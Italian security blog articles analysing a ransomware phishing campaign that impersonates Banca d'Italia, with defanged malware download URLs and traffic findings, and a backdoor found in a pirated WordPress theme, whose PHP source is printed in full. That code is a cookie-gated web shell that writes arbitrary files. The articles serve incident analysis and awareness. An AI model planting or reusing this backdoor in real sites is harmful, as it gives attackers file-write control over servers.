Articoli

Una nuova campagna di diffusione Malware rilevata il 30 Marzo 2017 sfrutta l’istituto Banca d’Italia per trarre in inganno l’utente finale mediante l’invio di una falsa notifica sull’esistenza di arretrati. L’eMail fraudolenta invita la potenziale vittima ad analizzare i propri debiti cliccando sul link riportato.

Il link in oggetto di analisi veicola l’utente su un sito Russo dal quale effettuerà il download dell’archivio notifica.zip, tale archivio al suo interno contiene il file notifica0021769.js opportunamente offuscato come possiamo visualizzare dall’immagine seguente.

Aprendo il file JavaScript il computer esegue il download del malware, denominato notifica.exe, da due possibili fonti:

http://asisa-isia[.]org/wp-content/uploads/sites/2/2017/notifica.exe

http://infinitiofkirklandleases[.]com/wp-includes/js/tinymce/plugins/paste/notifica.exe

Nei minuti successivi all’analisi da noi compiuta, il malware scaricato risultava corrotto e quindi non eseguibile su alcun dispositivo. Analizzando l’eseguibile era possibile notare blocchi di codice inopportuno che mostrano un errore di esecuzione del processo IPDATE riconducibile al software Download Accelerator Plus DAP10È probabile che il gruppo di criminali abbia scaricato il malware da una risorsa web tramite Download Accelerator e quest’ultimo a causa di un errore interno abbia corrotto l’eseguibile.

Dopo circa 20 minuti il file eseguibile è stato nuovamente caricato permettendo la corretta funzione, si è quindi rilevato essere un Ransomware.

VirusTotal ci riporta che il nuovo eseguibile viene rilevato da soli 9 antivirus su 61.

 

Analizzando successivamente il traffico eseguito dal Ransomware, abbiamo rilevato l’esecuzione di un demone Tor sulla macchina e una insolita attività di scansione di siti web basati sui CMS WordPress e Joomla.

In quasi 9 minuti di analisi il malware ha effettuato 2695 richieste HTTP come possiamo notare in alcuni seguenti screenshot.

Questo slideshow richiede JavaScript.

È quindi possibile che l’attaccante stia sfruttando le macchine infettate per scansionare la rete e identificare siti web basati sui due principali CMS. Non abbiamo invece rilevato alcuna attività di brute-forcing verso i domini scansionati per ricavarne eventuali credenziali.

Per chi volesse approfondire l’analisi rendiamo disponibile la scansione di VirusTotal e la condivisione del sample attraverso Malwr.

 

wordpress_themes_warez_backdoor

È ormai una notizia nota che i Temi o i Plugin di WordPress scaricati in maniera illegale, senza corrispondere il corretto compenso allo sviluppatore, contengano spesso Backdoor o Shell nascoste pronte per essere sfruttate per accedere al sito. Nonostante ciò la diffusione di tale materiale è ancora elevata e non mancano certamente gli utilizzatori che pur di risparmiare qualche euro mettano a repentaglio la sicurezza dei propri siti.

La scorsa settimana un sito internet Australiano è stato attaccato e sfruttato per diffondere Phishing ai danni di CartaSi. In collaborazione con il provider abbiamo analizzato il sito web e i relativi LOG per permettergli di contrastare l’accesso abusivo al dominio. Fin da subito abbiamo identificato l’utilizzo di un tema commerciale probabilmente scaricato da siti warez, vista la presenza del file: MafiaShare.net.txt nella directory del tema.

2016-09-28_screenshot_1519090

Successivamente analizzando tutti i file che compongono il tema abbiamo rilevato una backdoord nascosta utilizzabile solo a seguito di autenticazione, realizzata attraverso la lettura di Cookie. La backdoor scritta in PHP permette ad un utente malevolo di scrivere nuovi file sulla spazio web con contenuto arbitrario.

Il file in analisi, che vedete nell’immagine di apertura, è così composto:

/*
Plugin Name: [OMESSO]
Description: A plugin that show posts in column, featured image suported. Responsive supported.
Version: 1.0
Author: [OMESSO]
Author URI: http://www.[OMESSO].com/
*/

<?php
$trenz=$_COOKIE['cookie_name'];
$jban1=$_POST["jban1"];
$jban2=$_POST["jban2"];
$wp_editer=$_POST["wp_editer"];
$jban3=$_POST["jban3"];
if ((isset($trenz)) and ($trenz=="mypassword") and (isset($jban1)))
{
$wp_hasher=  $wp_editer($jban1,$jban2);
$jban3=stripslashes($jban3);
fwrite ($wp_hasher,$jban3);
}
if ((isset($trenz)) and ($trenz=="test"))
{
echo "Testing";
}
?>

Accedendo al fine senza inviare alcuna richiesta POST apparirà la porzione di testo commentata, poiché non correttamente indentato, che fa presupporre la legittimità del file. Ma realmente il file permette di creare nuovi file dal contenuto ed estensione arbitrarie. Per far ciò è però fondamentale creare un Cookie denominato cookie_name contenente il valore mypassword, il precedente script identifica tale cookie e se presente proseguirà nella lavorazione dei parametri POST passati. Parametri che conterranno il nome del file e il suo contenuto.

Quando si sviluppa un sito Internet in WordPress, ma non solo, è quindi fondamentale utilizzare Temi o Plugin distribuiti dai canali ufficiali acquistando ove necessario le relative licenze.